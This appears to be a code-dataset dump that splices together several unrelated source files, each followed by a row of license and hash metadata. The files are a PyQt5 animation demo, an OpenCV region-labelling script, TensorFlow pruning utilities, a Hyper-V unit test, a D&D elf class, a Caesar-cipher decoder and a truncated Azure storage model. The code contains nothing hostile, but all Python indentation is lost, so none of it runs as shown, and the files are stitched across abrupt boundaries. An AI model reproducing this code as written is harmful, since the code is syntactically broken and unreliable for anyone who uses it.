## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import (QAbstractTransition, QEasingCurve, QEvent,
QParallelAnimationGroup, QPropertyAnimation, qrand, QRect,
QSequentialAnimationGroup, qsrand, QState, QStateMachine, Qt, QTime,
QTimer)
from PyQt5.QtWidgets import (QApplication, QGraphicsScene, QGraphicsView,
QGraphicsWidget)
class StateSwitchEvent(QEvent):
StateSwitchType = QEvent.User + 256
def __init__(self, rand=0):
super(StateSwitchEvent, self).__init__(StateSwitchEvent.StateSwitchType)
self.m_rand = rand
def rand(self):
return self.m_rand
class QGraphicsRectWidget(QGraphicsWidget):
def paint(self, painter, option, widget):
painter.fillRect(self.rect(), Qt.blue)
class StateSwitchTransition(QAbstractTransition):
def __init__(self, rand):
super(StateSwitchTransition, self).__init__()
self.m_rand = rand
def eventTest(self, event):
return (event.type() == StateSwitchEvent.StateSwitchType and
event.rand() == self.m_rand)
def onTransition(self, event):
pass
class StateSwitcher(QState):
def __init__(self, machine):
super(StateSwitcher, self).__init__(machine)
self.m_stateCount = 0
self.m_lastIndex = 0
def onEntry(self, event):
n = qrand() % self.m_stateCount + 1
while n == self.m_lastIndex:
n = qrand() % self.m_stateCount + 1
self.m_lastIndex = n
self.machine().postEvent(StateSwitchEvent(n))
def onExit(self, event):
pass
def addState(self, state, animation):
self.m_stateCount += 1
trans = StateSwitchTransition(self.m_stateCount)
trans.setTargetState(state)
self.addTransition(trans)
trans.addAnimation(animation)
def createGeometryState(w1, rect1, w2, rect2, w3, rect3, w4, rect4, parent):
result = QState(parent)
result.assignProperty(w1, 'geometry', rect1)
result.assignProperty(w1, 'geometry', rect1)
result.assignProperty(w2, 'geometry', rect2)
result.assignProperty(w3, 'geometry', rect3)
result.assignProperty(w4, 'geometry', rect4)
return result
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
button1 = QGraphicsRectWidget()
button2 = QGraphicsRectWidget()
button3 = QGraphicsRectWidget()
button4 = QGraphicsRectWidget()
button2.setZValue(1)
button3.setZValue(2)
button4.setZValue(3)
scene = QGraphicsScene(0, 0, 300, 300)
scene.setBackgroundBrush(Qt.black)
scene.addItem(button1)
scene.addItem(button2)
scene.addItem(button3)
scene.addItem(button4)
window = QGraphicsView(scene)
window.setFrameStyle(0)
window.setAlignment(Qt.AlignLeft | Qt.AlignTop)
window.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
window.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
machine = QStateMachine()
group = QState()
timer = QTimer()
timer.setInterval(1250)
timer.setSingleShot(True)
group.entered.connect(timer.start)
state1 = createGeometryState(button1, QRect(100, 0, 50, 50), button2,
QRect(150, 0, 50, 50), button3, QRect(200, 0, 50, 50), button4,
QRect(250, 0, 50, 50), group)
state2 = createGeometryState(button1, QRect(250, 100, 50, 50), button2,
QRect(250, 150, 50, 50), button3, QRect(250, 200, 50, 50), button4,
QRect(250, 250, 50, 50), group)
state3 = createGeometryState(button1, QRect(150, 250, 50, 50), button2,
QRect(100, 250, 50, 50), button3, QRect(50, 250, 50, 50), button4,
QRect(0, 250, 50, 50), group)
state4 = createGeometryState(button1, QRect(0, 150, 50, 50), button2,
QRect(0, 100, 50, 50), button3, QRect(0, 50, 50, 50), button4,
QRect(0, 0, 50, 50), group)
state5 = createGeometryState(button1, QRect(100, 100, 50, 50), button2,
QRect(150, 100, 50, 50), button3, QRect(100, 150, 50, 50), button4,
QRect(150, 150, 50, 50), group)
state6 = createGeometryState(button1, QRect(50, 50, 50, 50), button2,
QRect(200, 50, 50, 50), button3, QRect(50, 200, 50, 50), button4,
QRect(200, 200, 50, 50), group)
state7 = createGeometryState(button1, QRect(0, 0, 50, 50), button2,
QRect(250, 0, 50, 50), button3, QRect(0, 250, 50, 50), button4,
QRect(250, 250, 50, 50), group)
group.setInitialState(state1)
animationGroup = QParallelAnimationGroup()
anim = QPropertyAnimation(button4, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
animationGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(100)
anim = QPropertyAnimation(button3, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(150)
anim = QPropertyAnimation(button2, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(200)
anim = QPropertyAnimation(button1, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
stateSwitcher = StateSwitcher(machine)
group.addTransition(timer.timeout, stateSwitcher)
stateSwitcher.addState(state1, animationGroup)
stateSwitcher.addState(state2, animationGroup)
stateSwitcher.addState(state3, animationGroup)
stateSwitcher.addState(state4, animationGroup)
stateSwitcher.addState(state5, animationGroup)
stateSwitcher.addState(state6, animationGroup)
stateSwitcher.addState(state7, animationGroup)
machine.addState(group)
machine.setInitialState(group)
machine.start()
window.resize(300, 300)
window.show()
qsrand(QTime(0, 0, 0).secsTo(QTime.currentTime()))
sys.exit(app.exec_())
| gpl-2.0 | -7,652,856,938,194,048,000 | 33.961373 | 80 | 0.677019 | false |
jskye/car-classifier-research | src/image.proc.tools/py/labelroi.py | 1 | 4177 | # USAGE
# python click_and_crop.py --image jurassic_park_kitchen.jpg
# import the necessary packages
import argparse
import cv2
import glob
# from gi.repository import Gtk
# initialize the list of reference points and boolean indicating
# whether cropping is being performed or not
refPt = []
cropping = False
outputimageFile = "labels.txt"
imgcounter = 0
roicounter = 0
lastroi = ""
lastImage = None
def click_and_crop(event, x, y, flags, param):
# grab references to the global variables
global refPt, cropping, imgcounter, roicounter, lastroi, lastImage
# if the left mouse button was clicked, record the starting
# (x, y) coordinates and indicate that cropping is being
# performed
if event == cv2.EVENT_LBUTTONDOWN:
#keep copy of current Image in case roi drawn wrong
lastImage = image.copy()
refPt = [(x, y)]
cropping = True
# write last roi to file. (assumes that a new roi means last was good)
with open(outputimageFile, 'a') as results:
results.write(lastroi)
lastroi = ""
# check to see if the left mouse button was released
elif event == cv2.EVENT_LBUTTONUP:
# increment roicounter
roicounter+=1
# record the ending (x, y) coordinates and indicate that
# the cropping operation is finished
refPt.append((x, y))
cropping = False
# draw a rectangle around the region of interest
cv2.rectangle(image, refPt[0], refPt[1], (0, 255, 0), 2)
cv2.imshow("image", image)
print(globalimageFile)
print("imgcounter: "+str(imgcounter))
print("roicounter: "+str(roicounter))
# with open(outputimageFile, 'a') as results:
# if roicounter>1:
# # print("writingtab")
# results.write("\t")
# results.write(str(refPt[0][0]) + " " \
# + str(refPt[0][1]) + " " \
# + str(refPt[1][0] - refPt[0][0]) + " " \
# + str(refPt[1][1] - refPt[0][1]))
# results.close()
if roicounter>1:
lastroi+="\t"
lastroi+=str(refPt[0][0]) + " "
lastroi+=str(refPt[0][1]) + " "
lastroi+=str(abs(refPt[1][0] - refPt[0][0])) + " "
lastroi+=str(abs(refPt[1][1] - refPt[0][1]))
# construct the argument parser and parse the arguments
# ap = argparse.ArgumentParser()
# ap.add_argument("-i", "--image", required=True, help="Path to the image")
# args = vars(ap.parse_args())
imageFiles=sorted(glob.glob("*.jpg"))
for imageFile in imageFiles:
imgcounter+=1
roicounter = 0
globalimageFile = imageFile
with open(outputimageFile, 'a') as results:
if imgcounter>1:
results.write("\n")
results.write(globalimageFile + " "+str(imgcounter) + " ")
results.close()
# load the image, originalImage it, and setup the mouse callback function
# image = cv2.imread(args["image"])
image = cv2.imread(imageFile)
originalImage = image.copy()
cv2.namedWindow("image")
cv2.setMouseCallback("image", click_and_crop)
# keep looping until the 'q' key is pressed
while True:
# display the image and wait for a keypress
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
# if the 'o' key is pressed, reset the image
# if key == ord("o"):
# # restore to original copy
# image = originalImage.copy()
# # delete last roi
# lastroi = ""
# if the 'r' key is pressed, reset the image to last copy lastroi
if key == ord("r"):
#TODO: remove last line of output file.
# copy image after every Rectangle
roicounter-=1
# restore to last copy
image = lastImage.copy()
cv2.imshow("image", image)
# delete last roi
lastroi = ""
# if the 'c' key is pressed, break from the loop
elif key == ord("c"):
# write last roi to file. (assumes that a new roi means last was good)
with open(outputimageFile, 'a') as results:
results.write(lastroi)
lastroi = ""
break
elif key == ord("q"):
#TODO: warn user quitting without a roi on an Image
# can use GTK crossplatform dialog
# http://python-gtk-3-tutorial.readthedocs.org/en/latest/dialogs.html
exit()
# # if there are two reference points, then crop the region of interest
# # from teh image and display it
# if len(refPt) == 2:
# roi = originalImage[refPt[0][1]:refPt[1][1], refPt[0][0]:refPt[1][0]]
# cv2.imshow("ROI", roi)
# cv2.waitKey(0)
# close all open windows
cv2.destroyAllWindows()
| mit | -3,855,644,297,113,608,000 | 30.406015 | 75 | 0.67321 | false |
tensorflow/model-optimization | tensorflow_model_optimization/python/core/sparsity/keras/prune.py | 1 | 9714 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access,missing-docstring,unused-argument
"""Entry point for pruning models during training."""
import tensorflow as tf
from tensorflow_model_optimization.python.core.keras import metrics
from tensorflow_model_optimization.python.core.sparsity.keras import pruning_schedule as pruning_sched
from tensorflow_model_optimization.python.core.sparsity.keras import pruning_wrapper
keras = tf.keras
custom_object_scope = tf.keras.utils.custom_object_scope
def prune_scope():
"""Provides a scope in which Pruned layers and models can be deserialized.
For TF 2.X: this is not needed for SavedModel or TF checkpoints, which are
the recommended serialization formats.
For TF 1.X: if a tf.keras h5 model or layer has been pruned, it needs to be
within this
scope to be successfully deserialized. This is not needed for loading just
keras weights.
Returns:
Object of type `CustomObjectScope` with pruning objects included.
Example:
```python
pruned_model = prune_low_magnitude(model, **self.params)
keras.models.save_model(pruned_model, keras_file)
with prune_scope():
loaded_model = keras.models.load_model(keras_file)
```
"""
return custom_object_scope(
{'PruneLowMagnitude': pruning_wrapper.PruneLowMagnitude})
@metrics.MonitorBoolGauge('prune_low_magnitude_usage')
def prune_low_magnitude(to_prune,
pruning_schedule=pruning_sched.ConstantSparsity(0.5, 0),
block_size=(1, 1),
block_pooling_type='AVG',
pruning_policy=None,
**kwargs):
"""Modify a tf.keras layer or model to be pruned during training.
This function wraps a tf.keras model or layer with pruning functionality which
sparsifies the layer's weights during training. For example, using this with
50% sparsity will ensure that 50% of the layer's weights are zero.
The function accepts either a single keras layer
(subclass of `tf.keras.layers.Layer`), list of keras layers or a Sequential
or Functional tf.keras model and handles them appropriately.
If it encounters a layer it does not know how to handle, it will throw an
error. While pruning an entire model, even a single unknown layer would lead
to an error.
Prune a model:
```python
pruning_params = {
'pruning_schedule': ConstantSparsity(0.5, 0),
'block_size': (1, 1),
'block_pooling_type': 'AVG'
}
model = prune_low_magnitude(
keras.Sequential([
layers.Dense(10, activation='relu', input_shape=(100,)),
layers.Dense(2, activation='sigmoid')
]), **pruning_params)
```
Prune a layer:
```python
pruning_params = {
'pruning_schedule': PolynomialDecay(initial_sparsity=0.2,
final_sparsity=0.8, begin_step=1000, end_step=2000),
'block_size': (2, 3),
'block_pooling_type': 'MAX'
}
model = keras.Sequential([
layers.Dense(10, activation='relu', input_shape=(100,)),
prune_low_magnitude(layers.Dense(2, activation='tanh'), **pruning_params)
])
```
Pretrained models: you must first load the weights and then apply the
prune API:
```python
model.load_weights(...)
model = prune_low_magnitude(model)
```
Optimizer: this function removes the optimizer. The user is expected to
compile the model
again. It's easiest to rely on the default (step starts at 0) and then
use that to determine the desired begin_step for the pruning_schedules.
Checkpointing: checkpointing should include the optimizer, not just the
weights. Pruning supports
checkpointing though
upon inspection, the weights of checkpoints are not sparse
(https://github.com/tensorflow/model-optimization/issues/206).
Arguments:
to_prune: A single keras layer, list of keras layers, or a
`tf.keras.Model` instance.
pruning_schedule: A `PruningSchedule` object that controls pruning rate
throughout training.
block_size: (optional) The dimensions (height, weight) for the block
sparse pattern in rank-2 weight tensors.
block_pooling_type: (optional) The function to use to pool weights in the
block. Must be 'AVG' or 'MAX'.
pruning_policy: (optional) The object that controls to which layers
`PruneLowMagnitude` wrapper will be applied. This API is experimental
and is subject to change.
**kwargs: Additional keyword arguments to be passed to the keras layer.
Ignored when to_prune is not a keras layer.
Returns:
Layer or model modified with pruning wrappers. Optimizer is removed.
Raises:
ValueError: if the keras layer is unsupported, or the keras model contains
an unsupported layer.
"""
def _prune_list(layers, **params):
wrapped_layers = []
for layer in layers:
# Allow layer that is already wrapped by the pruning wrapper
# to be used as is.
# No need to wrap the input layer either.
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
wrapped_layers.append(layer)
elif isinstance(layer, keras.layers.InputLayer):
# TODO(yunluli): Replace with a clone function in keras.
wrapped_layers.append(layer.__class__.from_config(layer.get_config()))
else:
wrapped_layers.append(
pruning_wrapper.PruneLowMagnitude(layer, **params))
return wrapped_layers
def _add_pruning_wrapper(layer):
if isinstance(layer, keras.Model):
# Check whether the model is a subclass model.
if (not layer._is_graph_network and
not isinstance(layer, keras.models.Sequential)):
raise ValueError('Subclassed models are not supported currently.')
return keras.models.clone_model(
layer, input_tensors=None, clone_function=_add_pruning_wrapper)
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
return layer
if pruning_policy and not pruning_policy.allow_pruning(layer):
return layer
else:
return pruning_wrapper.PruneLowMagnitude(layer, **params)
params = {
'pruning_schedule': pruning_schedule,
'block_size': block_size,
'block_pooling_type': block_pooling_type
}
is_sequential_or_functional = isinstance(
to_prune, keras.Model) and (isinstance(to_prune, keras.Sequential) or
to_prune._is_graph_network)
# A subclassed model is also a subclass of keras.layers.Layer.
is_keras_layer = isinstance(
to_prune, keras.layers.Layer) and not isinstance(to_prune, keras.Model)
if isinstance(to_prune, list):
return _prune_list(to_prune, **params)
elif is_sequential_or_functional:
if pruning_policy:
pruning_policy.ensure_model_supports_pruning(to_prune)
return _add_pruning_wrapper(to_prune)
elif is_keras_layer:
params.update(kwargs)
return pruning_wrapper.PruneLowMagnitude(to_prune, **params)
else:
raise ValueError(
'`prune_low_magnitude` can only prune an object of the following '
'types: tf.keras.models.Sequential, tf.keras functional model, '
'tf.keras.layers.Layer, list of tf.keras.layers.Layer. You passed '
'an object of type: {input}.'.format(input=to_prune.__class__.__name__))
def strip_pruning(model):
"""Strip pruning wrappers from the model.
Once a model has been pruned to required sparsity, this method can be used
to restore the original model with the sparse weights.
Only sequential and functional models are supported for now.
Arguments:
model: A `tf.keras.Model` instance with pruned layers.
Returns:
A keras model with pruning wrappers removed.
Raises:
ValueError: if the model is not a `tf.keras.Model` instance.
NotImplementedError: if the model is a subclass model.
Usage:
```python
orig_model = tf.keras.Model(inputs, outputs)
pruned_model = prune_low_magnitude(orig_model)
exported_model = strip_pruning(pruned_model)
```
The exported_model and the orig_model share the same structure.
"""
if not isinstance(model, keras.Model):
raise ValueError(
'Expected model to be a `tf.keras.Model` instance but got: ', model)
def _strip_pruning_wrapper(layer):
if isinstance(layer, tf.keras.Model):
# A keras model with prunable layers
return keras.models.clone_model(
layer, input_tensors=None, clone_function=_strip_pruning_wrapper)
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
# The _batch_input_shape attribute in the first layer makes a Sequential
# model to be built. This makes sure that when we remove the wrapper from
# the first layer the model's built state preserves.
if not hasattr(layer.layer, '_batch_input_shape') and hasattr(
layer, '_batch_input_shape'):
layer.layer._batch_input_shape = layer._batch_input_shape
return layer.layer
return layer
return keras.models.clone_model(
model, input_tensors=None, clone_function=_strip_pruning_wrapper)
| apache-2.0 | -797,842,022,771,012,500 | 35.795455 | 102 | 0.693226 | false |
angdraug/nova | nova/tests/virt/hyperv/test_utilsfactory.py | 12 | 2094 | # Copyright 2014 Cloudbase Solutions SRL
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for the Hyper-V utils factory.
"""
import mock
from oslo.config import cfg
from nova import test
from nova.virt.hyperv import hostutils
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import vmutilsv2
CONF = cfg.CONF
class TestHyperVUtilsFactory(test.NoDBTestCase):
def test_get_vmutils_force_v1_and_min_version(self):
self._test_returned_class(None, True, True)
def test_get_vmutils_v2(self):
self._test_returned_class(vmutilsv2.VMUtilsV2, False, True)
def test_get_vmutils_v2_r2(self):
self._test_returned_class(vmutils.VMUtils, False, False)
def test_get_vmutils_force_v1_and_not_min_version(self):
self._test_returned_class(vmutils.VMUtils, True, False)
def _test_returned_class(self, expected_class, force_v1, os_supports_v2):
CONF.set_override('force_hyperv_utils_v1', force_v1, 'hyperv')
with mock.patch.object(
hostutils.HostUtils,
'check_min_windows_version') as mock_check_min_windows_version:
mock_check_min_windows_version.return_value = os_supports_v2
if os_supports_v2 and force_v1:
self.assertRaises(vmutils.HyperVException,
utilsfactory.get_vmutils)
else:
actual_class = type(utilsfactory.get_vmutils())
self.assertEqual(actual_class, expected_class)
| apache-2.0 | -8,863,784,196,907,203,000 | 35.736842 | 78 | 0.689112 | false |
chielk/dndmake | dndraces/elf.py | 1 | 2365 | from dndraces import Race
import random
class Elf(Race):
NAME = "elf"
LAWFULNESS = (-3, 2) # mu, sigma
GOODNESS = (2, 2) # mu, sigma
HAIR = {"black": 20,
"brown": 35,
"blond": 15,
"ginger": 8,
"green": 1,
"blue": 1,
"white": 1,
"red": 1,
}
EYES = {"blue": 20,
"brown": 40,
"green": 10,
"black": 10,
"red": 1,
"violet": 1,
}
MALE_NAME = ["Aramil",
"Aust",
"Enialis",
"Heian",
"Himo",
"Ivellios",
"Lau-cian",
"Quarion",
"Soverliss",
"Thamior",
"Tharivol"]
FEMALE_NAME = ["Anastrianna",
"Antinua",
"Drusilia",
"Felosial",
"Ielenia",
"Lia",
"Mialee",
"Qillathe",
"Silaqui",
"Vadania",
"Valanthe",
"Xanaphia"]
FAMILY_NAME = ["Amastacia (Starflower)",
"Amakiir (Gemflower)",
"Galanodel (Moonwhisper)",
"Holimion (Diamonddew)",
"Liadon (Silverfrond)",
"Meliamne (Oakenheel)",
"Naïlo (Nightbreeze)",
"Siannodel (Moonbrook)",
"Ilphukiir (Gemblossom)",
"Xiloscient (Goldpetal)"]
# Gender Base Height Height Modifier Base Weight Weight Modifier
# Male 4' 5" +2d6 85 lb. x (1d6) lb.
# Female 4' 5" +2d6 80 lb. x (1d6) lb.
H_MOD = "2d6"
H_UNIT = "inch"
W_MOD = "1d6"
W_UNIT = "lbs"
class Male(Race.Male):
H_BASE = "4'5\""
W_BASE = "85lbs"
class Female(Race.Female):
H_BASE = "4'5\""
W_BASE = "80lbs"
def make_name(self):
if self.gender.NAME == "male":
first_name = random.choice(self.MALE_NAME)
else:
first_name = random.choice(self.FEMALE_NAME)
family_name = random.choice(self.FAMILY_NAME)
self.name = first_name + " " + family_name
| gpl-3.0 | -3,738,826,518,536,718,300 | 25.863636 | 69 | 0.388325 | false |
kdeloach/nyc-trees | src/nyc_trees/nyc_trees/settings/production.py | 3 | 3371 | """Production settings and globals."""
from os import environ
from dns import resolver, exception
from boto.utils import get_instance_metadata
from base import * # NOQA
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
instance_metadata = get_instance_metadata(timeout=5)
if not instance_metadata:
raise ImproperlyConfigured('Unable to access the instance metadata')
# HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production # NOQA
ALLOWED_HOSTS = [
'treescount.nycgovparks.org',
'training.treescount.azavea.com',
'treescount.azavea.com',
'.elb.amazonaws.com',
'localhost'
]
# ELBs use the instance IP in the Host header and ALLOWED_HOSTS checks against
# the Host header.
ALLOWED_HOSTS.append(instance_metadata['local-ipv4'])
# END HOST CONFIGURATION
# EMAIL CONFIGURATION
EMAIL_BACKEND = 'apps.core.mail.backends.boto.EmailBackend'
EMAIL_BOTO_CHECK_QUOTA = False
# END EMAIL CONFIGURATION
# SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('DJANGO_SECRET_KEY')
# END SECRET CONFIGURATION
# TILER CONFIGURATION
try:
import logging
logger = logging.getLogger(__name__)
# Lookup the CNAME record for TILER_HOST. Should be
# tile.service.nyc-trees.internal and resolve to the CloudFront
# distribution FQDN.
answers = resolver.query(environ.get('TILER_HOST'), 'CNAME')
if answers:
# Remove trailing period because that's part of the DNS specification.
TILER_URL = '//%s' % (str(answers[0]).rstrip('.'))
else:
logger.debug('TILER_HOST DNS query returned no answers')
except exception.DNSException:
logger.exception('Failed to resolve TILER_HOST, %s' %
environ.get('TILER_HOST'))
# END TILER CONFIGURATION
# Django Storages CONFIGURATION
mac_metadata = instance_metadata['network']['interfaces']['macs']
vpc_id = mac_metadata.values()[0]['vpc-id']
# The VPC id should stay the same for all app servers in a particular
# environment and remain the same after a new deploy, but differ between
# environments. This makes it a suitable S3 bucket name
AWS_STORAGE_BUCKET_NAME = 'django-storages-{}'.format(vpc_id)
AWS_AUTO_CREATE_BUCKET = True
DEFAULT_FILE_STORAGE = 'libs.custom_storages.PublicS3BotoStorage'
# The PRIVATE_AWS_STORAGE_* settings configure the S3 bucket
# used for files only accessible by census admins (e.g. data dumps)
PRIVATE_AWS_STORAGE_BUCKET_NAME = 'django-storages-private-{}'.format(vpc_id)
PRIVATE_AWS_STORAGE_AUTO_CREATE_BUCKET = True
# The number of seconds that a generated link to a file in the private
# bucket is active.
PRIVATE_AWS_STORAGE_QUERYSTRING_EXPIRE = 30
PRIVATE_AWS_STORAGE_DEFAULT_ACL = 'private'
PRIVATE_AWS_STORAGE_URL_PROTOCOL = 'https:'
# There is no need to specify access key or secret key
# They are pulled from the instance metadata by Boto
# END Django Storages CONFIGURATION
| agpl-3.0 | -5,422,635,833,353,874,000 | 32.04902 | 103 | 0.735983 | false |
stefan-caraiman/python-lab | python/solutii/vlad_cristia_avram/caesar/caesar.py | 5 | 1200 | """Rezolvare problema caesar"""
from __future__ import print_function
def gaseste_cheia(mesaj):
"""Aflam cheia mesajului"""
prima_litera = mesaj[0]
cheie = (ord('z') + 1 - ord(prima_litera)) % 26
return cheie
def afiseaza_mesajul(mesaj, cheie):
"""Functie de afisare mesaj"""
for litera in mesaj:
aux2 = ord(litera)
aux = ord('z')
if litera.isalpha():
if aux2 + cheie > aux:
litera = chr(aux2 + cheie - aux + ord('a') - 1)
print(litera, end="")
else:
litera = chr(aux2 + cheie)
print(litera, end="")
else:
print(litera, end="")
print()
def decripteaza_mesajul(mesaj):
"""Functia de decriptare a mesajului"""
cheie = gaseste_cheia(mesaj)
afiseaza_mesajul(mesaj, cheie)
def main():
"""Functia main a programului"""
try:
fisier = open("mesaje.secret", "r")
mesaje = fisier.read()
fisier.close()
except IOError:
print("Nu am putut obtine mesajele.")
return
for mesaj in mesaje.splitlines():
decripteaza_mesajul(mesaj)
if __name__ == "__main__":
main()
| mit | 6,510,986,399,228,709,000 | 22.529412 | 63 | 0.544167 | false |
switowski/cds-demosite | cds/base/recordext/functions/sync_corparate_names.py | 12 | 1885 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from invenio.modules.jsonalchemy.jsonext.functions.util_merge_fields_info_list \
import util_merge_fields_info_list
def sync_corparate_names(self, field_name, connected_field, action): # pylint: disable=W0613
"""
Sync meeting names content only when `__setitem__` or similar is used
"""
if action == 'set':
if field_name == 'meeting_names' and self.get('meeting_names'):
self.__setitem__('_first_meeting_name',
self['meeting_names'][0],
exclude=['connect'])
if self['meeting_names'][1:]:
self.__setitem__('_additional_meeting_names',
self['meeting_names'][1:],
exclude=['connect'])
elif field_name in ('_first_author', '_additional_authors'):
self.__setitem__(
'meeting_names',
util_merge_fields_info_list(self, ['_first_meeting_name',
'_additional_meeting_names']),
exclude=['connect'])
| gpl-2.0 | -7,320,243,428,681,449,000 | 43.880952 | 93 | 0.605305 | false |
yaqiyang/autorest | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/storage_account.py | 4 | 6450 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class StorageAccount(Resource):
"""The storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id
:vartype id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param provisioning_state: Gets the status of the storage account at the
time the operation was called. Possible values include: 'Creating',
'ResolvingDNS', 'Succeeded'
:type provisioning_state: str or :class:`ProvisioningState
<fixtures.acceptancetestsstoragemanagementclient.models.ProvisioningState>`
:param account_type: Gets the type of the storage account. Possible
values include: 'Standard_LRS', 'Standard_ZRS', 'Standard_GRS',
'Standard_RAGRS', 'Premium_LRS'
:type account_type: str or :class:`AccountType
<fixtures.acceptancetestsstoragemanagementclient.models.AccountType>`
:param primary_endpoints: Gets the URLs that are used to perform a
retrieval of a public blob, queue or table object.Note that StandardZRS
and PremiumLRS accounts only return the blob endpoint.
:type primary_endpoints: :class:`Endpoints
<fixtures.acceptancetestsstoragemanagementclient.models.Endpoints>`
:param primary_location: Gets the location of the primary for the storage
account.
:type primary_location: str
:param status_of_primary: Gets the status indicating whether the primary
location of the storage account is available or unavailable. Possible
values include: 'Available', 'Unavailable'
:type status_of_primary: str or :class:`AccountStatus
<fixtures.acceptancetestsstoragemanagementclient.models.AccountStatus>`
:param last_geo_failover_time: Gets the timestamp of the most recent
instance of a failover to the secondary location. Only the most recent
timestamp is retained. This element is not returned if there has never
been a failover instance. Only available if the accountType is
StandardGRS or StandardRAGRS.
:type last_geo_failover_time: datetime
:param secondary_location: Gets the location of the geo replicated
secondary for the storage account. Only available if the accountType is
StandardGRS or StandardRAGRS.
:type secondary_location: str
:param status_of_secondary: Gets the status indicating whether the
secondary location of the storage account is available or unavailable.
Only available if the accountType is StandardGRS or StandardRAGRS.
Possible values include: 'Available', 'Unavailable'
:type status_of_secondary: str or :class:`AccountStatus
<fixtures.acceptancetestsstoragemanagementclient.models.AccountStatus>`
:param creation_time: Gets the creation date and time of the storage
account in UTC.
:type creation_time: datetime
:param custom_domain: Gets the user assigned custom domain assigned to
this storage account.
:type custom_domain: :class:`CustomDomain
